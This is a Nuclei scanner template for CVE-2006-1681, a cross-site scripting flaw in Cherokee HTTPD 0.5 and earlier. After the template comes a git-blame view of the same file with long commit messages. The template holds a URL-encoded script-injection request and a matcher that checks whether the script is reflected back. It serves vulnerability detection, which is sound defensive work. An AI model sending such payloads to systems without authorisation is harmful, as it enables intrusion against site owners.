nuclei-templates/cves/2006/CVE-2006-1681.yaml

id: CVE-2006-1681

info:
  name: Cherokee HTTPD <=0.5 - Cross-Site Scripting
  author: geeknik
  severity: medium
  description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
  reference:
    - http://web.archive.org/web/20210217161726/https://www.securityfocus.com/bid/17408/
    - http://web.archive.org/web/20140803090438/http://secunia.com/advisories/19587/
    - http://www.vupen.com/english/advisories/2006/1292
    - https://nvd.nist.gov/vuln/detail/CVE-2006-1681
  classification:
    cve-id: CVE-2006-1681
  tags: cherokee,httpd,xss,cve,cve2006

requests:
  - method: GET
    path:
      - "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

# Enhanced by mp on 2022/08/12
Create CVE-2006-1681.yaml 2021-08-06 16:58:00 +00:00			`id: CVE-2006-1681`

			`info:`
Dashboard Content Enhancements (#5092) Dashboard Content Enhancements 2022-08-16 14:14:41 +00:00			`name: Cherokee HTTPD <=0.5 - Cross-Site Scripting`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`author: geeknik`
			`severity: medium`
Dashboard Content Enhancements (#5092) Dashboard Content Enhancements 2022-08-16 14:14:41 +00:00			`description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.`
Create CVE-2006-1681.yaml 2021-08-06 16:58:00 +00:00			`reference:`
Remove Links for Dead sites (#4554) * Deleted buffalo-config-injection.yaml Add reference from buffalo-config-injection.yaml to CVE-2021-20091.yaml * Delete vulnerabilities/other/buffalo-config-injection.yaml * Remove/replace links to dead sites: * archives.neohapsis.com * osvdb.org * securityfocus.com 2022-06-07 20:50:59 +00:00			`- http://web.archive.org/web/20210217161726/https://www.securityfocus.com/bid/17408/`
Dead Site Removal (#4641) * Deleted buffalo-config-injection.yaml Add reference from buffalo-config-injection.yaml to CVE-2021-20091.yaml * Delete vulnerabilities/other/buffalo-config-injection.yaml * Link cleanups * Change links to Secunia to point to archive.org * Additonal link cleanup * replace securitytracker.com links with archive.org links 2022-07-01 10:02:07 +00:00			`- http://web.archive.org/web/20140803090438/http://secunia.com/advisories/19587/`
Auto Generated CVE annotations [Fri Jul 1 10:17:46 UTC 2022] :robot: 2022-07-01 10:17:46 +00:00			`- http://www.vupen.com/english/advisories/2006/1292`
Dashboard Content Enhancements (#5092) Dashboard Content Enhancements 2022-08-16 14:14:41 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2006-1681`
Dashboard Content Enhancement (#4020) * Enhancement: cnvd/2021/CNVD-2021-15822.yaml by mp * Enhancement: exposed-panels/apache/tomcat-pathnormalization.yaml by mp * Enhancement: cves/2021/CVE-2021-40542.yaml by mp * Enhancement: misconfiguration/horde-unauthenticated.yaml by mp * Enhancement: misconfiguration/horde-unauthenticated.yaml by mp * Enhancement: misconfiguration/horde-unauthenticated.yaml by mp * Enhancement: cves/2021/CVE-2021-40542.yaml by mp * Enhancement: exposed-panels/apiman-panel.yaml by mp * Enhancement: cves/2010/CVE-2010-1873.yaml by mp * Enhancement: exposed-panels/arcgis/arcgis-panel.yaml by mp * Enhancement: exposed-panels/arcgis/arcgis-rest-api.yaml by mp * Enhancement: exposed-panels/argocd-login.yaml by mp * Enhancement: exposed-panels/atlassian-crowd-panel.yaml by mp * Enhancement: exposed-panels/atvise-login.yaml by mp * Enhancement: exposed-panels/avantfax-panel.yaml by mp * Enhancement: exposed-panels/avatier-password-management.yaml by mp * Enhancement: exposed-panels/axigen-webadmin.yaml by mp * Enhancement: exposed-panels/axigen-webmail.yaml by mp * Enhancement: exposed-panels/azkaban-web-client.yaml by mp * Enhancement: exposed-panels/acunetix-panel.yaml by mp * Enhancement: exposed-panels/adiscon-loganalyzer.yaml by mp * Enhancement: exposed-panels/adminer-panel.yaml by mp * Enhancement: cves/2010/CVE-2010-1870.yaml by mp * Enhancement: exposed-panels/adminset-panel.yaml by mp * Enhancement: exposed-panels/adobe/adobe-component-login.yaml by mp * Enhancement: exposed-panels/adobe/adobe-connect-central-login.yaml by mp * Enhancement: exposed-panels/adobe/adobe-experience-manager-login.yaml by mp * Enhancement: exposed-panels/adobe/adobe-media-server.yaml by mp * Enhancement: exposed-panels/advance-setup.yaml by mp * Enhancement: exposed-panels/aerohive-netconfig-ui.yaml by mp * Enhancement: exposed-panels/aims-password-mgmt-client.yaml by mp * Enhancement: exposed-panels/aims-password-mgmt-client.yaml by mp * Enhancement: exposed-panels/aims-password-portal.yaml by mp * Enhancement: exposed-panels/airflow-panel.yaml by mp * Enhancement: exposed-panels/airflow-panel.yaml by mp * spacing issues * Spacing * HTML codes improperly interpreted Relocate horde-unauthenticated.yaml to CVE-2005-3344.yaml * Relocate horde-unauthenticated.yaml to CVE-2005-3344.yaml * Enhancement: technologies/waf-detect.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml by mp * Enhancement: network/sap-router-info-leak.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml by mp * Enhancement: network/sap-router-info-leak.yaml by mp * Enhancement: network/exposed-adb.yaml by mp * Enhancement: vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml by mp * Enhancement: vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml by mp * Enhancement: vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml by mp * Enhancement: vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml by mp * Enhancement: exposures/tokens/digitalocean/tugboat-config-exposure.yaml by mp * Enhancement: exposed-panels/concrete5/concrete5-install.yaml by mp * Enhancement: vulnerabilities/wordpress/wordpress-infinitewp-auth-bypass.yaml by mp * indentation issue * Character encoding issue fix * Enhancement: default-logins/alibaba/canal-default-login.yaml by mp * Enhancement: default-logins/alphaweb/alphaweb-default-login.yaml by mp * Enhancement: default-logins/ambari/ambari-default-login.yaml by mp * Enhancement: default-logins/apache/airflow-default-login.yaml by mp * Enhancement: default-logins/apache/apisix-default-login.yaml by mp * Enhancement: default-logins/apollo/apollo-default-login.yaml by mp * Enhancement: default-logins/arl/arl-default-login.yaml by mp * Enhancement: default-logins/digitalrebar/digitalrebar-default-login.yaml by mp * Enhancement: default-logins/mantisbt/mantisbt-default-credential.yaml by mp * Enhancement: default-logins/stackstorm/stackstorm-default-login.yaml by mp * Enhancement: dns/caa-fingerprint.yaml by mp * Enhancement: exposed-panels/active-admin-exposure.yaml by mp * Enhancement: exposed-panels/activemq-panel.yaml by mp * Enhancement: default-logins/ambari/ambari-default-login.yaml by mp * Restore & stomped by dashboard * Enhancement: cves/2010/CVE-2010-1653.yaml by mp * Enhancement: cves/2021/CVE-2021-38751.yaml by mp * Enhancement: cves/2021/CVE-2021-39320.yaml by mp * Enhancement: cves/2021/CVE-2021-39322.yaml by mp * Enhancement: cves/2021/CVE-2021-39327.yaml by mp * Enhancement: cves/2021/CVE-2021-39350.yaml by mp * Enhancement: cves/2021/CVE-2021-39433.yaml by mp * Enhancement: cves/2021/CVE-2021-41192.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-15824.yaml by mp * Enhancement: exposed-panels/ansible-semaphore-panel.yaml by mp * Enhancement: exposed-panels/aviatrix-panel.yaml by mp * Enhancement: cves/2022/CVE-2022-24288.yaml by mp * Enhancement: cves/2022/CVE-2022-24990.yaml by mp * Enhancement: cves/2022/CVE-2022-26159.yaml by mp * Enhancement: default-logins/aem/aem-default-login.yaml by mp * Enhancement: exposed-panels/blue-iris-login.yaml by mp * Enhancement: exposed-panels/bigbluebutton-login.yaml by mp * Enhancement: cves/2022/CVE-2022-24288.yaml by mp * Enhancement: cves/2022/CVE-2022-24990.yaml by mp * Enhancement: cves/2022/CVE-2022-26159.yaml by mp * Enhancement: default-logins/aem/aem-default-login.yaml by mp * Spacing issues Add cve-id field * fix & stomping * Enhancement: cves/2016/CVE-2016-1000141.yaml by mp * Enhancement: cves/2020/CVE-2020-24912.yaml by mp * Enhancement: cves/2021/CVE-2021-35265.yaml by mp * Enhancement: cves/2022/CVE-2022-0437.yaml by mp * Enhancement: cves/2010/CVE-2010-1601.yaml by mp * Enhancement: technologies/teradici-pcoip.yaml by mp * Enhancement: vulnerabilities/other/unauth-hoteldruid-panel.yaml by mp * Enhancement: cves/2010/CVE-2010-1475.yaml by mp * Enhancement: cves/2010/CVE-2010-1535.yaml by mp * Enhancement: exposed-panels/epson-web-control-detect.yaml by mp * Enhancement: exposed-panels/epson-access-detect.yaml by mp * Enhancement: cves/2020/CVE-2020-29453.yaml by mp * Fix spacing * Remove empty cve lines and relocate tags * Remove blank cve lines & move tags * Fix merge errors * Enhancement: cves/2020/CVE-2020-21224.yaml by mp * Enhancement: cves/2020/CVE-2020-24148.yaml by mp * Enhancement: cves/2020/CVE-2020-24391.yaml by mp * Enhancement: cves/2020/CVE-2020-24589.yaml by mp * Enhancement: cves/2020/CVE-2020-25213.yaml by mp * Enhancement: cves/2020/CVE-2020-25223.yaml by mp * Enhancement: cves/2020/CVE-2020-25506.yaml by mp * Enhancement: cves/2020/CVE-2020-2551.yaml by mp * Enhancement: cves/2020/CVE-2020-28871.yaml by mp * Enhancement: cves/2020/CVE-2020-28188.yaml by mp * Enhancement: cves/2020/CVE-2020-26948.yaml by mp * Enhancement: cves/2020/CVE-2020-26919.yaml by mp * Enhancement: cves/2020/CVE-2020-26214.yaml by mp * Enhancement: cves/2020/CVE-2020-25223.yaml by mp * Enhancement: cves/2020/CVE-2020-21224.yaml by mp * Enhancement: cves/2020/CVE-2020-24148.yaml by mp * Enhancement: cves/2020/CVE-2020-24186.yaml by mp * Enhancement: cves/2020/CVE-2020-24186.yaml by mp * Enhancement: cves/2020/CVE-2020-24391.yaml by mp * Enhancement: cves/2020/CVE-2020-24589.yaml by mp * Enhancement: cves/2020/CVE-2020-25213.yaml by mp * Enhancement: cves/2020/CVE-2020-25223.yaml by mp * Enhancement: cves/2020/CVE-2020-25506.yaml by mp * Enhancement: cves/2020/CVE-2020-28871.yaml by mp * Enhancement: cves/2020/CVE-2020-28188.yaml by mp * Enhancement: cves/2020/CVE-2020-26948.yaml by mp * Enhancement: cves/2020/CVE-2020-26919.yaml by mp * Enhancement: cves/2020/CVE-2020-26214.yaml by mp * Syntax cleanup * Enhancement: cves/2021/CVE-2021-38647.yaml by mp * Syntax and a title change * Enhancement: cves/2021/CVE-2021-38702.yaml by mp * Fix references * Enhancement: cves/2021/CVE-2021-38704.yaml by mp * Enhancement: cves/2021/CVE-2021-41691.yaml by mp * Enhancement: cves/2021/CVE-2021-41691.yaml by mp * Enhancement: cves/2021/CVE-2021-41691.yaml by mp * Enhancement: cves/2021/CVE-2021-44529.yaml by mp * Conflicts resolved * Fix quoting * Enhancement: cves/2021/CVE-2021-45967.yaml by mp * Enhancement: cves/2022/CVE-2022-0189.yaml by mp * Enhancement: cves/2022/CVE-2022-0189.yaml by mp * Enhancement: cves/2022/CVE-2022-23779.yaml by mp * Enhancement: default-logins/apache/dolphinscheduler-default-login.yaml by mp * Enhancement: default-logins/cobbler/hue-default-credential.yaml by mp * Enhancement: default-logins/emqx/emqx-default-login.yaml by mp * Enhancement: default-logins/geoserver/geoserver-default-login.yaml by mp * Enhancement: cves/2021/CVE-2021-38647.yaml by mp * Enhancement: cves/2021/CVE-2021-41691.yaml by mp * Enhancement: cves/2021/CVE-2021-45967.yaml by mp * Enhancement: cves/2022/CVE-2022-0189.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-14536.yaml by mp * Enhancement: default-logins/apache/dolphinscheduler-default-login.yaml by mp * Enhancement: default-logins/geoserver/geoserver-default-login.yaml by mp * Update CVE-2020-25223.yaml * Update CVE-2020-26214.yaml * Update CVE-2020-25506.yaml * Update CVE-2020-2551.yaml * Update CVE-2020-26919.yaml * Update CVE-2021-44529.yaml * Update CVE-2020-28871.yaml * Update CVE-2020-28188.yaml * Update CVE-2021-45967.yaml * Update hue-default-credential.yaml * Update CVE-2021-44529.yaml * misc syntax update * Syntax restore some characters * Spacing * Enhancement: vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml by mp * Enhancement: vulnerabilities/wordpress/issuu-panel-lfi.yaml by mp * Enhancement: cves/2019/CVE-2019-10068.yaml by mp * Enhancement: cves/2019/CVE-2019-10232.yaml by mp * Enhancement: cves/2019/CVE-2019-10758.yaml by mp * Enhancement: cves/2019/CVE-2019-11510.yaml by mp * Enhancement: cves/2019/CVE-2019-11580.yaml by mp * Enhancement: cves/2019/CVE-2019-11581.yaml by mp * Enhancement: cves/2019/CVE-2019-12314.yaml by mp * Enhancement: cves/2019/CVE-2019-13101.yaml by mp * Link wrapping issue * Enhancement: cves/2019/CVE-2019-13462.yaml by mp * Enhancement: cves/2019/CVE-2019-15107.yaml by mp * Enhancement: cves/2019/CVE-2019-15859.yaml by mp * Enhancement: cves/2019/CVE-2019-16759.yaml by mp * Enhancement: cves/2019/CVE-2019-16662.yaml by mp * Enhancement: cves/2019/CVE-2019-16278.yaml by mp * Enhancement: cves/2019/CVE-2019-10232.yaml by mp * Enhancement: cves/2019/CVE-2019-10758.yaml by mp * Enhancement: cves/2019/CVE-2019-11510.yaml by mp * Enhancement: cves/2019/CVE-2019-12725.yaml by mp * Enhancement: cves/2019/CVE-2019-13101.yaml by mp * Enhancement: cves/2019/CVE-2019-15107.yaml by mp * Enhancement: cves/2019/CVE-2019-15859.yaml by mp * Enhancement: cves/2019/CVE-2019-16662.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-10543.yaml by cs * Enhancement: cves/2021/CVE-2021-33807.yaml by mp * Enhancement: cves/2010/CVE-2010-0943.yaml by mp * Enhancement: cves/2008/CVE-2008-6172.yaml by mp * Enhancement: vulnerabilities/simplecrm/simple-crm-sql-injection.yaml by mp * Enhancement: vulnerabilities/oracle/oracle-siebel-xss.yaml by mp * Enhancement: cves/2010/CVE-2010-1602.yaml by mp * Enhancement: cves/2010/CVE-2010-1474.yaml by mp * Enhancement: network/cisco-smi-exposure.yaml by mp * Enhancement: cves/2021/CVE-2021-37704.yaml by mp * Enhancement: vulnerabilities/other/microweber-xss.yaml by mp * Enhancement: cves/2019/CVE-2019-16313.yaml by mp * Enhancement: cves/2021/CVE-2021-3017.yaml by mp * Enhancement: cves/2010/CVE-2010-1353.yaml by mp * Enhancement: cves/2010/CVE-2010-5278.yaml by mp * Enhancement: cves/2021/CVE-2021-37573.yaml by mp * Enhancement: vulnerabilities/oracle/oracle-siebel-xss.yaml by mp * Enhancement: cves/2010/CVE-2010-1602.yaml by mp * Enhancement: cves/2010/CVE-2010-1474.yaml by mp * Enhancement: vulnerabilities/other/microweber-xss.yaml by mp * Enhancement: cves/2018/CVE-2018-11709.yaml by mp * Enhancement: cves/2014/CVE-2014-2321.yaml by mp * Enhancement: vulnerabilities/other/visual-tools-dvr-rce.yaml by mp * Enhancement: vulnerabilities/other/visual-tools-dvr-rce.yaml by mp * Manual enhancement * Manual enhancement push due to dashboard failure * Testing of dashboard accidentally commited to dashboard branch * Spacing Put some CVEs in the classification * Add missing cve-id fields to templates in cve/ Co-authored-by: sullo <sullo@cirt.net> Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: sandeep <sandeep@projectdiscovery.io> 2022-04-01 08:51:42 +00:00			`classification:`
			`cve-id: CVE-2006-1681`
Update CVE-2006-1681.yaml 2021-08-07 09:10:03 +00:00			`tags: cherokee,httpd,xss,cve,cve2006`
Create CVE-2006-1681.yaml 2021-08-06 16:58:00 +00:00
			`requests:`
			`- method: GET`
			`path:`
Update CVE-2006-1681.yaml 2021-08-07 09:10:03 +00:00			`- "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"`
Create CVE-2006-1681.yaml 2021-08-06 16:58:00 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`
			`- type: word`
			`words:`
Update CVE-2006-1681.yaml 2021-08-07 09:10:03 +00:00			`- "</script><script>alert(document.domain)</script>"`
Update CVE-2006-1681.yaml 2021-08-07 09:10:24 +00:00
			`- type: word`
			`part: header`
			`words:`
			`- text/html`
Dashboard Content Enhancements (#5092) Dashboard Content Enhancements 2022-08-16 14:14:41 +00:00
			`# Enhanced by mp on 2022/08/12`